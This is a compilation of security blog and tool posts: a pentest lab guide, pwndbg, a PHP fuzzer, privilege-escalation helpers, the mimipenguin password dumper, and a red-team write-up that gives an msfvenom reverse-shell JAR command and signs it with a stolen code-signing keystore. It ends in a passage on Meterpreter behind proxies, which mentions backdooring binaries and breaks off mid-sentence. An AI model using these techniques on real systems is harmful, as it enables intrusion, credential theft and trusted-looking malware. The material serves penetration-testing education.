hidviz ./hidviz 2) Running on Windows 3) Installing Not yet available 4) License Hidviz is license under GPLv3+. For more information see LICENSE file. Sursa: https://github.com/ondrejbudai/hidviz/
-
- 1
-
-
Thursday, May 4, 2017 Pentest Home Lab - 0x0 - Building a virtual corporate domain Whether you are a professional penetration tester or want to be become one, having a lab environment that includes a full Active Directory domain is really helpful. There have been many times where in order to learn a new skill, technique, exploit, or tool, I've had to first set it up in an AD lab environment. Reading about attacks and understanding them at a high level is one thing, but I often have a hard time really wrapping my head around something until I've done it myself. Take Kerberoasting for example: Between Tim's talk a few years back, Rob's posts, and Will's post, I knew what was happening at a high level, but I didn't want to try out an attack I'd never done before in the middle of an engagement. But before I could try it out for myself, I had to first figure out how to create an SPN. So off to Google I went, and then off to the lab: I set up MSSQL on a domain connected server in my home lab I created a new user in my AD I created a SPN using setspn, pairing the new user to the MSSQL instance I used Empire to grab the SPN hash as an unprivileged domain user (So cool!!) I sent the SPN hash to the password cracker and got the weak password THAT was a fun night! So back to the goal of this blog series. I'll share what I've learned while building my own lab(s), I'll share some of the things I've done in my lab to try and improve my skills, and for every attack I cover, I'll also cover how to set up your lab environment. Selecting Your Virtualization Stack QUESTION: Should I build this in the cloud or on premises? Before we can get to any of the hacking, we need to talk about where you are going to install your virtual environment. In fact, your home lab doesn't even need to be located within your home. I'll give an overview of each option, but the decision will likely be influenced by what hardware you having lying around, how much you want to spend up front, and how much you will be using your lab. In the end, you might even want to try more than one option, as they all have distinct benefits. Cloud Based Often, building a home lab using dedicated hardware is cost prohibitive. In addition to hardware costs, if you add windows licensing costs, a traditional home lab can get really expensive. The good news is these days you don't need to buy any hardware or software (OS). You can build your lab using AWS, Azure, Google, etc. In addition to not having to purchase hardware, another major advantage of building your lab in the cloud is that the Windows licensing costs are built into your hourly rate (at least for AWS -- I'm not as familiar with Azure or Google). Pros Hardware No hardware purchases OS Licensing No Windows OS software purchases No expiring Windows eval licenses Hourly Pricing You only pay for the time you use the lab machines Education You will learn a lot about the cloud stack you are building on Cons Cost Leaving your instances running gets pretty expensive. Four windows servers (t2.micro) running 24/7 will put you at around 45 bucks a month Keeping track of instances If you don't want them running all the time, you will have to remember to shut down instances when not in use or configure CloudWatch to do that for you You can't pause instances In AWS at least, you can't pause VMs like you can with virtualization software. This is pretty annoying if you are used to pausing your VM's at the end of each session and picking up where you left off Limited Windows OS Support No Windows 7/8/10 images (might be AWS specific) Some testing activities need to be approved You'll have to notify the cloud provider if you want to attack your instances from outside your virtual private cloud (VPC) AWS Math AWS can be cheap, or it can get very expensive, depending on how you use it. The key here is to think about how much you will be using your lab. If you think you will play in your lab around 3 hours a night about 10 nights a month, AWS makes a lot of sense. If you are going to be running your hosts permanently, it will probably be more cost effective to run your lab on premises. Here are some cost estimations using AWS's cost estimator: 2 Windows instances, 1 Kali instance 4 Windows instances, 1 Kali instance As you can see, the difference is pretty extreme. Remember to turn off those instances when not in use! One caveat with building your lab entirely in the cloud, at least with AWS, is that AWS does not offer an AMI for Windows 7/8/10. While it appears possible to use your own Windows7/8/10 image, now you are back to either using eval licenses or paying for them. While doing research for this blog series, I came across something called AWS workspaces, and even that does not use 7/8/10. It simulates a desktop environment using Microsoft's Desktop Experience via Windows Server 2012. After playing around with Amazon Workspaces, I realized it is not the best option for a pentest lab due to monthly costs ($7 per month per workstation), but I did learn you don't really NEED Windows 7/8/10 in your pentest home lab to do most of what we will want to do, which was a good lesson. In an upcoming post, I will write in detail about Building your AD lab on AWS. On Premises If you are going to build the lab on your own hardware, the next decision you need to make is: Do I use dedicated hardware and a hypervisor, or do I run software that sits on top of my host OS like VMware Workstaion Pro, Workstation Player, VMware Fusion (Mac), or Virtualbox? Using your Desktop/Laptop If you have a desktop/laptop that has plenty of resources to spare, there is no reason you can't set this entire environment up on your OS of choice using either VMware or VirtualBox. On my laptop, I use VMware Workstation and have a test domain with 1 domain controller, 1 additional Windows server, and 1 Windows7 host. With a 1TB HDD and 16GB of RAM, I can run all three if I need to, and Kali at the same time. If you can swing 32GB and a bigger SSD, that would give you even more flexibility. As I mentioned in the cons above, you might be limited. My current laptop can't take more than 16GB. Pros Mobility Take your lab with you wherever you go (if you have a laptop) Easy entry You probably already have a Desktop/Laptop that you can use Free Options VirtualBox and VMware Workstation Player are free Cons Cost VMware Workstation Pro (windows) and VMware Fusion (mac) are not free Hardware Limitations Your current desktop/laptop might be limited in how much memory you can add to it Shared Resourcing You are competing for shared resources on your host OS. This might not be acceptable Every time you need to reboot your host OS, you have to stop/pause all of your VMs Using a Hypervisor Most penetration testers that I know still keep it traditional and use dedicated hardware combined with a Hypervisor for their home lab. There are plenty of great articles that talk about hardware requirements and options. I have friends who prefer to go the route of buying old enterprise software on ebay, but I have always just used consumer hardware. Either way, between the RAM and fast disks, it can get expensive. On my server, I have an AMD 8 core chip circa 2015, and I just upgraded from 16 to 32GB of RAM, and from a 512 SSD to a 1TB SSD. If you can afford it, avoid the mistake I made and just go right to 32RAM and a 1TB SSD. That will give you more than enough room to grow your lab, make templates, take lots of snapshots, etc. Pros Flexibility With dedicated hardware, you can isolate the lab on it's own network, VLAN, etc. Software cost There are plenty of free options when it comes to Hypervisors Options You can take advantage of things like KVM, containers, and thin provisioning Portability If you use something small like an Intel NUC, your lab can be portable Cons Energy Inefficient The last thing anyone who reads this post needs is yet another computer running 24/7 Cost Unless you have something laying around already, you'll have to buy new hardware Vendor Specific Knowledge Do you have the time and desire to learn all of the hypervisor specific troubleshooting commands when something breaks? Great Home Lab Resources Home Lab Design by Carlos Perez My new home lab setup by Carlos Perez Building an Effective Active Directory Lab Environment for Testing by Sean Metcalf Intel NUC Super Server by Mubix Over the years I've played with a few of the popular Hypervisors, and here are my thoughts: Vmware ESXi - My first lab was ESXi. If you've never used it, I recommend using this as your Hypervisor if for no other reason than it is ubiquitous in the enterprise. You will find ESX on every internal pentest, and having experience with it from your home lab will help you one day. Citrix Xen - Eventually my ESX hard drive failed. After reading this post by Mubix, when I rebuilt, I tried Citrix's Xen Server. I liked Xen, but I quickly ran out of space on my 512G SSD, and when I added a second drive it started to freak out. The amount of custom Xen commands I had to learn was getting out of control, and I didn't feel like the experience was going to help me all that much so I pulled the plug and looked for something new. Proxmox VE - For my third iteration, I'm using Proxmox VE, after my friend @mikehacksthings gave a presentation on it at a recent @IthacaSec meeting. I really like it! Thin provisioning means it uses a lot less resources, and it seems lightning fast compared to ESXi and Xen. It definitely has my stamp of approval so far. In an upcoming post, I'm going to write in detail about building your AD lab on premises using Proxmox. Getting Windows Server Software If you are going to build your lab in the cloud, you can just relax and skip this section. If you are going to build on premises, you will need to get your hands on the following software: Required - Windows Server (2012 or 2016) Optional - Windows 7 (or 8 or 10) In terms of getting the software, there are a few options: Download evaluation versions, which are good for 180 days. See if your workplace has a key/iso that can be used in a lab environment. Go with a cloud solution like AWS or Azure where the licensing costs are built into your hourly rate. I think if you are a student you can get the OS's for free. For more detail on these options, check out Sean Metcalf''s blog post: Building an Effective Active Directory Lab Environment for Testing. You will also notice that Sean gives some really useful breakdowns of what he feels you need in an AD lab. I'm going to keep this series more basic than that, but I encourage you to read his post. Let's create a Domain Once you have selected your virtualization stack, it is time to configure it. The following two posts take you through setting up two AD Lab environments. One in the cloud using AWS, and another on premises using Proxmox VE. Pentest Home Lab - 0x1 - Building Your AD Lab on AWS Pentest Home Lab - 0x2 - Building Your AD Lab on Premises (Coming Soon) Wrap-Up Feedback, suggestions, corrections, and questions are welcome! Posted by Seth Art at 5:32 PM Sursa: https://sethsec.blogspot.ro/2017/05/pentest-home-lab-0x0-building-virtual.html
-
pwndbg pwndbg (/poʊndbæg/) is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers. It has a boatload of features, see FEATURES.md. Why? Vanilla GDB is terrible to use for reverse engineering and exploit development. Typing x/g30x $esp is not fun, and does not confer much information. The year is 2016 and GDB still lacks a hexdump command. GDB's syntax is arcane and difficult to approach. Windbg users are completely lost when they occasionally need to bump into GDB. What? Pwndbg is a Python module which is loaded directly into GDB, and provides a suite of utilities and crutches to hack around all of the cruft that is GDB and smooth out the rough edges. Many other projects from the past (e.g., gdbinit, PEDA) and present (e.g. GEF) exist to fill some these gaps. Unfortunately, they're all either unmaintained, unmaintainable, or not well suited to easily navigating the code to hack in new features (respectively). Pwndbg exists not only to replace all of its predecessors, but also to have a clean implementation that runs quickly and is resilient against all the weird corner cases that come up. How? Installation is straightforward. Pwndbg is best supported on Ubuntu 14.04 with GDB 7.7, and Ubuntu 16.04 with GDB 7.11. git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh If you use any other Linux distribution, we recommend using the latest available GDB built from source. Be sure to pass --with-python=/path/to/python to configure. What can I do with that? For further info about features/functionalities, see FEATURES. Who? Most of Pwndbg was written by Zach Riggle, with many other contributors offering up patches via Pull Requests. Want to help with development? Read CONTRIBUTING. Contact If you have any questions not worthy of a bug report, feel free to ping ebeip90 at #pwndbg on Freenode and ask away. Click here to connect. Link: https://github.com/pwndbg/pwndbg
-
PHP Vulnerability Hunter Overview Overview | Screenshots | Guide | Download | Change Log PHP Vulnerability Hunter is an advanced whitebox PHP web application fuzzer that scans for several different classes of vulnerabilities via static and dynamic analysis. By instrumenting application code, PHP Vulnerability Hunter is able to achieve greater code coverage and uncover more bugs. Key Features Automated Input Mapping While most web application fuzzers rely on the user to specify application inputs, PHP vulnerability hunter uses a combination of static and dynamic analysis to automatically map the target application. Because it works by instrumenting application, PHP Vulnerability Hunter can detected inputs that are not referenced in the forms of the rendered page. Several Scan Modes PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation. PHP Vulnerability Hunter can detect the following classes of vulnerabilities: Arbitrary command execution Arbitrary file read/write/change/rename/delete Local file inclusion Arbitrary PHP execution SQL injection User controlled function invocatino User controlled class instantiation Reflected cross-site scripting (XSS) Open redirect Full path disclosure Code Coverage Get measurements of how much code was executed during a scan, broken down by scan plugin and page. Code coverage can be calculated at either the function level or the code block level. Scan Phases Initialization Phase During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs. Scan Phase This is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs. Uninitialization Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase. Link: https://www.autosectools.com/PHP-Vulnerability-Scanner
-
- 1
-
-
RootHelper Roothelper will aid in the process of privilege escalation on a Linux system that has been compromised, by fetching a number of enumeration and exploit suggestion scripts. The latest version downloads five scripts. Two enumeration shellscripts, one information gathering shellscript and two exploit suggesters, one written in perl and the other one in python. The credits for the scripts it fetches go to the original authors. Note I've recently added a new script to my Github that follows the general principles of this script however it aims to be more comprehensive with regards to it's capabilities. Besides downloading scripts that aid in privilege escalation on a Linux system it also comes with functionality to enumerate the system in question and search for cleartext credentials and much more. It is in many regards RootHelper's successor and it can be found by clicking here. Priv-Esc scripts LinEnum Shellscript that enumerates the system configuration. unix-privesc-check Shellscript that enumerates the system configuration and runs some privilege escalation checks as well. Firmwalker Shellscript that gathers useful information by searching the mounted firmware filesystem. For things such as SSL and web server related files, config files, passwords, common binaries and more. linuxprivchecker A python implementation to suggest exploits particular to the system that's been compromised. Linux_Exploit_Suggester A perl script that that does the same as the one mentioned above. Usage To use the script you will need to get it on the system you've compromised, from there you can simply run it and it will show you the options available and an informational message regarding the options. For clarity i will post it below as well. The 'Help' option displays this informational message. The 'Download' option fetches the relevant files and places them in the /tmp/ directory. The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper. Credits for the other scripts go to their original authors. https://github.com/rebootuser/LinEnum https://github.com/PenturaLabs/Linux_Exploit_Suggester http://www.securitysift.com/download/linuxprivchecker.py https://github.com/pentestmonkey/unix-privesc-check https://github.com/craigz28/firmwalker Link: https://github.com/NullArray/RootHelper
-
mimipenguin A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. Details Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches. Requires root permissions Supported/Tested Systems Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) Archlinux x64 Gnome 3 (Gnome Keyring 3.20) VSFTPd 3.0.3-8+b1 (Active FTP client connections) Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency] openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage) Notes Password moves in memory - still honing in on 100% effectiveness Plan on expanding support and other credential locations Working on expanding to non-desktop environments Known bug - sometimes gcore hangs the script, this is a problem with gcore Open to pull requests and community research LDAP research (nscld winbind etc) planned for future Development Roadmap MimiPenguin is slowly being ported to multiple languages to support all possible post-exploit scenarios. The roadmap below was suggested by KINGSABRI to track the various versions and features. An "X" denotes full support while a "~" denotes a feature with known bugs. Feature .sh .py GDM password (Kali Desktop, Debian Desktop) ~ X Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) X X VSFTPd (Active FTP Connections) X X Apache2 (Active HTTP Basic Auth Sessions) ~ ~ OpenSSH (Active SSH Sessions - Sudo Usage) ~ ~ Contact Twitter: @huntergregal Website: huntergregal.com Github: huntergregal Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Special Thanks the-useless-one for remove Gcore as a dependency, cleaning up tabs, adding output option, and a full python3 port gentilkiwi for Mimikatz, the inspiration and the twitter shoutout pugilist for cleaning up PID extraction and testing ianmiell for cleaning up some of my messy code w0rm for identifying printf error when special chars are involved benichmt1 for identifying multiple authenticate users issue ChaitanyaHaritash for identifying special char edge case issues ImAWizardLizard for cleaning up the pattern matches with a for loop coreb1t for python3 checks, arch support, other fixes n1nj4sec for a python2 port and support KINGSABRI for the Roadmap proposal bourgouinadrien for linking https://github.com/koalaman/shellcheck Link: https://github.com/huntergregal/mimipenguin
-
- 1
-
-
Apache and Java Information Disclosures Lead to Shells 26 January 2017 Overview During a recent Red-Team engagement, we discovered a series of information disclosures on a site allowing our team to go from zero access to full compromise in a matter of hours. Information disclosures in Apache HTTP servers with mod_status enabled allowed our team to discover.jar files, hosted on the site. Static values within exposed .jar files allowed our team to extract the client’s code signing certificate and sign malicious Java executables as the client. These malicious .jar files were used in a successful social engineering campaign against the client. These typically overlooked, but easily mitigated vulnerabilities quickly turned into a path to full compromise. We won’t go into much detail about the steps taken after the initial compromise. We’ll save that for another blog. Now for the fun stuff… Apache Mod_Status Apache mod_status is an Apache module allowing administrators to view quick status information by navigating to the /server-status page, i.e. https://www.apache.org/server-status. This isn’t necessarily a vulnerability on its own, but when implemented in public facing production environments, it can provide attackers a treasure-trove of useful information; especially when the ExtendedStatus option is configured. During our OSINT phase of the engagement, we incorporate a series of Google Dorks, including searching for enabled mod_status: site:<site> inurl:"server-status" intext:"Apache Server Status for" Alternatively, given a range of IPs instead of a URL, you can use a Bash “for” loop, like the following, to search for /server-status pages: for i in `cat IPs.txt`; do echo $i & curl -ksL -m2 https://$i/server-status | head -n 5 | grep "Status" ; done > output.txt However, the loop above will query the server, making it NOT OpSec friendly. Use with caution if stealth is key on an engagement. So why do we dork for server_status? Because among the valuable information disclosed such as server version, uptime, and process information, the ExtendedStatus option displays recent HTTP requests to the server. If recent requests contain authorization information, such as tokens, you can see why this page would be valuable to an attacker. In a lot of cases this dork doesn’t come back with any results, but in this scenario, we found several systems with both mod_status and ExtendedStatus configured. What made this even more interesting, was that several HTTP requests were made for files with .jar extensions: A quick test, using wget, shows this page is accessible without authenticating, and we grab the rt.jar file for further examination. We wanted to examine all the jars; so, with a quick curl we were able to list all requests containing the .jar extension: curl http://<site>/server-status | grep GET | cut -d “>” -f9 |cut -d “ “ -f2 |grep jar > jars.txt Using a quick Bash “for” loop, we grabbed all the files using wget: for I in `cat jars.txt` ; do wget http://127.0.0.1$i ; done You can also navigate to the page and click all the links to download each file, but we were operating from a C2 server with no GUI, so Bash+Wget was necessary. Java Static Values After downloading the jars locally for examination, we used a Java decompiler to examine the code. Our preference is JD-Gui (https://github.com/java-decompiler/jd-gui), but there are plenty of other options out there for decompilers. After examining the files, it was quickly apparent that several static values were used in the JARs, including passwords, UIDs, and local paths. The biggest finding however, was the Keystore password found in the POM.xml file located in the print.jar applet: A Java Keystore is used to store authorization or encryption certificates in Java applications. These typically provide the applet with the ability to authenticate to a service or encryption over HTTPS. The XML file in the screenshot above provided the Keystore name, alias, and password; all we needed to find the Keystore. Luckily the Keystore was stored in the rt.jar file that as also accessible without authentication, and in our possession. We simply unzipped the rt.jar file to extract the AppletSigningKeystore2016.jks file: unzip rt.jar Using the hardcoded Keystore password we discovered in the print.jar applet, we could decrypt the Keystore and export the code signing certificate. keytool -exportcert -keystore AppletSigningKeystore2016.jks -alias JAR -file cert.der Using OpenSSL, we converted the certificate to a human-readable .crt format: openssl x509 -inform der -in cert.der -out cert.crt Further digging in to the discovered jars indicated that the client used the certificate in the Keystore to sign other applets. Creating Signed Malicious JARs After determining the AppletSigningKeystore2016.jks Keystore contained the client’s code signing certificate, we shifted our efforts to creating a Java payload with a reverse shell. The payload we used was tailored to the client, but here’s an example of using msfvenom to create a simple JAR file with an embedded meterpreter shell: msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o payload.jar Using the Jarsigner application provided in Java’s JDK, we were then able to sign the payload with the AppletSigningKeystore2016.jks Keystore, containing the client’s code signing certificate: jarsigner -keystore AppletSigningKeystore2016.jks /payload.jar JAR This made it appear as if the client created the application themselves, thus increasing the likelihood that a user would execute the file and give us a shell: Wrap-up So now we had a functioning payload, signed by the client, ready to use against their users. All it took was a little effort during the recon phase, an attention to detail, and a tiny bit of Java knowledge. In many cases, it’s easy overlook what would normally be considered a minor vulnerability, but in this case, not overlooking these tiny details lead to full compromise of the client’s network. We won’t go in to any details about the social engineering campaign, because all it takes one user to click a link or run an executable, and it becomes an internal pentest. Let’s just say we got a few shells. It’s also worth noting that malware developers are actively code-signing their malware with stolen certificates. Here’s a more recent example of a code-signing technique being utilized to spread malware: https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates There are a few things to take away from this as security professionals: Disable Apache Mod_Status in production servers. Where possible, utilize an authentication mechanism when hosting applets that contain sensitive functionality, i.e. make users login to download applets. Scrub the code of your applets to remove any potential information disclosures. References Information on Apache Mod_Status Module https://httpd.apache.org/docs/2.4/mod/mod_status.html Apache Mod-Status Module – Extended Status https://httpd.apache.org/docs/2.4/mod/core.html#extendedstatus Apache Authentication and Authorization https://httpd.apache.org/docs/2.4/howto/auth.html https://httpd.apache.org/docs/2.4/howto/access.html Java JDK http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html JD-GUI https://github.com/java-decompiler/jd-gui Digital Ocean - Java Keytool Essentials: Working with Java Keystores https://www.digitalocean.com/community/tutorials/java-keytool-essentials-working-with-java-keystores Digital Ocean - OpenSSL Essentials: Working with SSL Certificates, Private Keys and CSRs https://www.digitalocean.com/community/tutorials/openssl-essentials-working-with-ssl-certificates-private-keys-and-csrs#convert-certificate-formats Richard De La Cruz Sursa: http://threat.tevora.com/apache-and-java-information-disclosures-lead-to-shells/
-
- 1
-
-
Cryptoknife Cryptoknife is an open source portable utility to allow hashing, encoding, and encryption through a simple drag-and-drop interface. It also comes with a collection of miscellaneous tools. The mainline branch officially supports Windows and Mac. Cryptoknife is free and licensed GPL v2 or later. It can be used for both commercial and personal use. Cryptoknife works by checking boxes for the calculations and then dragging files to run the calculation. Cryptoknife performs the work from every checked box on every tab and displays the output the log and saves to a log file. By default, very common hashing boxes are pre-checked. Support Twitter: @NagleCode You may also track this project on GitHub. Secure Anonymous Email: Contact me Settings and Log for Windows, the settings are saved as cryptoknife_settings.ini inside the run-time directory. The log file is cryptoknife.log is also in the run-time directory. For Mac, settings are saved in Library/Application Support/com.cryptoknife/cryptoknife_settings.ini. The log file is cryptoknife.log and is saved in your Downloads directory. Settings are saved when the app exits. The log is saved whenever the console is updated. Hashing Simply check the boxes for the algorithms to use, and then drag-and-drop your directory or file. MD5, MD4, MD2 SHA-1, 224, 256, 384, 256 CRC-32 Checksum There is also direct input available. Cryptoknife will perform all hashing algorithms on direct input. Encoding Except for line-ending conversion, Cryptoknife appends a new file extension when performing its work. However, it is still very easy to drag-and-drop and encoder/encrypt thousands of files. With great power comes great responsibility. Base64 HEX/Binary DOS/Unix EOL There is also direct input available. Results are displayed (which may not be viewable for binary results). Encryption All the encryption algorithms use CBC mode. You may supply your own Key/IV or generate a new one. Note that if you change the bit-level, you need to re-click "Generate" since different bits require different lengths. AES/Rijndael CBC Blowfish CBC Triple DES CBC Twofish CBC Utilities System profile gives a listing of RAM, processor, attached drives, and IP addresses. It is also ran on start-up. ASCII/HEX is the same conversion interface used by Packet Sender. Epoch/Date is a very common calculation used in development. Password Generator has various knobs to create a secure password. System Profile ASCII/HEX Epoch/Date convert Password Generator Using Cryptoknife, an open-source utility which generates no network traffic, is a very safe way to generate a password. Building Cryptoknife uses these libraries. https://www.cryptopp.com/ https://www.qt.io/download-open-source/ All the project files are statically-linked to create a single executable in Windows. Mac uses dynamic linking since apps are just directories. Sponsorships Would you like your name or brand listed on this website? Please contact me for sponsorship opportunities. License GPL v2 or Later. Contact me if you require a different license. Copyright Cryptoknife is wholly owned and copyright © - @NagleCode - DanNagle.com - Cryptoknife.com Link: https://github.com/dannagle/Cryptoknife
-
- 1
-
-
Încărcat pe 27 apr. 2017 by Max Bazaliy, Vlad Putin, and Alex Hude
-
- 2
-
-
Juan CaillavaFollow Pentester at Deloitte Argentina. May 4 A Meterpreter and Windows proxy case Introduction A few months ago, while I was testing a custom APT that I developed for attack simulations in an enterprise Windows environment that allows access to Internet via proxy, I found that the HTTPs staged Meterpreter payload was behaving unexpectedly. To say the truth, at the beginning I was not sure if it was a problem related to the Meterpreter injection in memory that my APT was doing or something else. As the APT had to be prepared to deal with proxy environments, then I had to find out the exact problem and fix it. After doing a thorough analysis of the situation, I found out that the Meterpreter payload I was using (windows/meterpreter/reverse_https, Framework version: 4.12.40-dev) may not be working properly. Before starting with the technical details, I will provide data about the testing environment: Victim OS / IP: Windows 8.1 x64 Enterprise /10.x.x.189 Internet access: via an authenticated proxy (“Automatically detect settings” IE configuration / DHCP option). Proxy socket: 10.x.x.20:8080 External IP via proxy: 190.x.x.x Attacker machine: 190.y.y.y Meterpreter payload: windows/meterpreter/reverse_https Note: as a reminder, the reverse_https payload is a staged one. That is, the first code that is executed in the victim machine will download and inject in memory (via reflective injection) the actual Meterpreter DLL code (metsrv.x86.dll or metsrv.x64.dll). The following screenshot shows the external IP of the victim machine: The following screenshot shows the proxy configuration (Automatically detect settings) of the victim machine: The following screenshot shows the use of “autoprox.exe” on the victim machine. Observe that a proxy configuration was obtained via DHCP (option 252): In the above image it can be observed that, for “www.google.com", the proxy 10.x.x.20:8080 has to be used. This can also be learnt by manually downloading and inspecting the rules contained in the wpad.dat file (its location was provided via the option 252 of DHCP). Note: according to my analysis, autoprox.exe (by pierrelc@microsoft.com) will use the Windows API to search first for the proxy settings received via DHCP and then if it fails, it will search for proxy settings that can be obtained via DNS. Analysis During the analysis of the problem, I will be changing a few lines of code of the Meterpreter payload and testing it in the victim machine, therefore it is required to create a backdoored binary with a HTTPS reverse meterpreter staged payload (windows/meterpreter/reverse_https) or use a web delivery module. Whatever you want to use, is ok. Note: a simple backdoored binary can be created with Shellter and any trusted binary such as putty.exe, otherwise, use the Metasploit web delivery payload with Powershell. Remember that we will be modifying the stage payload and not the stager, therefore you just need to create one backdoored binary for all the experiment. Let’s execute the backdoored binary on the victim machine and observe what happens in the Metasploit listener that is running on the attacker machine. The following screenshot shows that the MSF handler is running on the victim machines (PORT 443), and then a connection is established with the victim machine (SRC PORT 18904): In the above image, it can be observed that the victim machine is reaching the handler and we are supposedly getting a Meterpreter shell. However, it was impossible to get a valid answer for any command I introduced and then the session is closed. From a high level perspective, when the stager payload (a small piece of code) is executed on the victim machine, it connects back to the listener to download a bigger piece of code (the stage Meterpreter payload), injects it in memory and give the control to it. The loaded Meterpreter payload will connect again with the listener allowing the interaction with the affected system. From what we can see so far, the stager was successfully executed and was able to reach the listener through the proxy. However, when the stage payload was injected (if it worked), something is going wrong and it dies. Note: in case you are wondering, the AV was verified and no detection was observed. Also, in case the network administrator decided to spy the HTTPs content, I manually created a PEM certificate, configured the listener to make use of it and then compared the fingerprint of the just created certificate against the fingerprint observed with the browser when the Metasploit listener was visited manually to make sure the certificate was not being replaced in transit. This motivated me to continue looking for the problem in other place. The next, perhaps obvious, step would be to sniff the traffic from the victim machine to understand more about what is happening (from a blackbox perspective). The following screenshot shows the traffic captured with Wireshark on the victim machine: In the above image it can be observed a TCP connection between the victim machine (10.x.x.189) and the the proxy server (10.x.x.20:8080), where a CONNECT method is sent (first packet) from the victim asking for a secure communication (SSL/TLS) with the attacker machine (190.x.x.x:443). In addition, observe the NTLM authentication used in the request (NTLMSSP_AUTH) and the response from the proxy server is a “Connection established” (HTTP/1.1 200). After that, an SSL/TLS handshake took place. It worth mentioning that the above image shows the traffic sent and received during the first part, that is, when the stager payload was executed. After the connection is established, a classic SSL/TLS handshake is performed between the two ends (the client and the server), and then, within the encrypted channel, the stage payload will be transferred from the attacker machine to the victim. Now that we confirmed that the first part (staging) of the Meterpreter “deployment” was working, what follows is to understand what is happening with the second part, that is, the communication between the stage payload and the listener. In order to do that, we just need to continue analyzing the traffic captured with Wireshark. The following screenshot shows what would be the last part of the communication between the stager payload and the listener, and then an attempt of reaching the attacker machine directly from the victim (without using the proxy): In the first 5 packets of the above image, we can see the TCP connection termination phase (FIN,ACK; ACK; FIN,ACK; ACK) between the victim machine (10.x.x.189) and the proxy server (10.x.x.20). Then, it can be observed that the 6th packet contains a TCP SYN flag (to initiate a TCP handshake) sent from the victim machine to the attacker machine directly, that is, without using the proxy server as intermediary. Finally, observe the 7th packet received by the victim machine from the gateway indicating the destination (attacker machine) is not directly reachable from this network (remember I told you that it was required to use a proxy server to reach Internet). So, after observing this traffic capture and seeing that the Meterpreter session died, we can think that the Meterpreter stage payload was unable to reach the listener because, for some reason, it tried to reach it directly, that is, without using the system proxy server in the same way the stager did. What we are going to do now is to download Meterpreter source code, and try to understand what could be the root cause of this behavior. To do this, we should follow the “Building — Windows” guide published in the Rapid7 github (go to references for a link). Now, as suggested by the guide, we can use Visual Studio 2013 to open the project solution file (\metasploit-payloads\c\meterpreter\workspace\meterpreter.sln) and start exploring the source code. After exploring the code, we can observe that within the “server_transport_winhttp.c” source code file there is a proxy settings logic implemented (please, go to the references to locate the source file quickly). The following screenshot shows part of the code where the proxy setting is evaluated by Meterpreter: As I learnt from the Meterpreter reverse_https related threads in github, it will try to use (firstly) the WinHTTP Windows API for getting access to the Internet and in this portion of code, we are seeing exactly that. As we can see in the code it has plenty of dprintf call sentences that are used for debugging purposes, and that would provide valuable information during our runtime analysis. In order to make the debugging information available for us, it is required to modify the DEBUGTRACE pre-processor constant in the common.h source code header file that will make the server (Meterpreter DLL loaded in the victim) to produce debug output that can be read using Visual Studio’s _Output_ window, DebugView from SysInternals, or _Windbg_. The following screenshot shows the original DEBUGTRACE constant commented out in the common.h source code file: The following screenshot shows the required modification to the source code to obtain debugging information: Now, it is time to build the solution and copy the resulting “metsrv.x86.dll” binary file saved at “\metasploit-payloads\c\meterpreter\output\x86\” to the attacker machine (where the metasploit listener is), to the corresponding path (in my case, it is /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-payloads-1.1.26/data/meterpreter/). On the debugging machine, let’s run the “DebugView” program and then execute the backdoored binary again to have the Meterpreter stager running on it. The following screenshot shows the debugging output produced on the victim machine: From the debugging information (logs) generated by Meterpreter, it can be observed that the lines 70 through 74 corresponds to the lines 48 through 52 of the server_transport_winhttp.c source code file, where the dprintf sentences are. In particular, the line 71 (“[PROXY] AutoDetect: yes”) indicates that the proxy “AutoDetect” setting was found in the victim machine. However, the proxy URL obtained was NULL. Finally, after that, it can be observed that the stage tried to send a GET request (on line 75). Thanks to the debugging output generated by Meterpreter, we are now closer to the problem root. It looks like the piece of code that handles the Windows proxy setting is not properly implemented. In order to solve the problem, we have to analyze the code, modify it and test it. As building the Meterpreter C solution multiple times, copying the resulting metsrv DLL to the attacker machine and testing it with the victim is too much time consuming I thought it would be easier and painless to replicate the proxy handling piece of code in Python (ctypes to the rescue) and modify it multiple times in the victim machine. The following is, more or less, the Meterpreter proxy piece of code that can be found in the analyzed version of the server_transport_winhttp.c source code file, but written in Python: The following screenshot shows the execution of the script on the victim machine: The output of the script shows the same information that was obtained in the debugging logs. The proxy auto configuration setting was detected, but no proxy address was obtained. If you check the code again you will realize that the DHCP and DNS possibilities are within the “if” block that evaluates the autoconfiguration URL (ieConfig.lpszAutoConfigUrl). However, this block would not be executed if only the AutoDetect option is enable, and that is exactly what is happening on this particular victim machine. In this particular scenario (with this victim machine), the proxy configuration is being obtained via DHCP through the option 252. The following screenshot shows DHCP transaction packets sniffed on the victim machine: Observe from the DHCP transaction sniffed on the victim machine that the DHCP answer, from the server, contains the option 252 